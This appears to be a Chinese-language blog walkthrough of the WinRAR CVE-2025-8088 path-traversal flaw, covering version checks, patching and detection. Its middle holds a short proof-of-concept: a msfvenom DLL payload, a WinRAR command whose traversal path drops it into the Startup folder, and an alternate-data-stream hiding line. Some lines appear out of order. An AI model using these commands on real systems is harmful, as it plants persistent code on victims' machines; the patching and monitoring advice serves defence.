关于揭秘、修补和保障 WinRAR CVE-2025-8088 安全的趣味演练,融合了黑客的实操视角。
WinRAR——每个人都装着但没人更新的古老经典——刚刚被曝出一个高严重性零日漏洞:CVE-2025-8088。
CISA 甚至把它列入已知被利用漏洞目录,修复截止日期为 2025 年 9 月 2 日。这不仅仅是理论——这是实弹射击。
..\Startup\evil.dll受影响:Windows 版 WinRAR(≤7.12)、UnRAR.dll、便携版 UnRAR 安全:。
在恐慌或扮演黑客之前,检查你的版本。
帮助 → 关于 WinRARwinget list WinRAR
(或从其安装目录运行 winrar.exe)
UnRAR.dll → 属性 → 详细信息。当我开始写这篇文章时,我用的还是 7.10 —— 嗯,正合时宜 🗿🐔🍗。
帮助 → 关于 WinRAR → 应该显示 7.13 或更高。UnRAR.dll 的工具,请替换对应的 DLL。WinRAR 不会自动更新——在日历上设个提醒,别成为静止的靶子。
PS:忽略我在这里炫耀的壁纸——总得展示一下!😏
%TEMP% 和启动文件夹。⚠ 免责声明: 此内容仅用于教育和授权的安全测试。不要变成小捣蛋鬼 🗿。
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
砰——evil.dll 出现在启动文件夹中。下次重启?你好,calc.exe。
修复 → WinRAR 7.13+
检查可疑的 .dll 或 .lnk 是否出现在:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%监控 ADS:
streams.exe -s C:\
IDS/IPS 规则:标记包含 ..\ 序列的 RAR。
Nessus/Qualys 插件已上线。
这可不是一个“总有一天”的漏洞——它在披露之前就被武器化了。 如果你还在用 7.10(就像我写这篇文章时一样),现在就去打补丁。 如果你是红队成员,把这次当成一个旧工具如何成为新攻击向量的案例研究。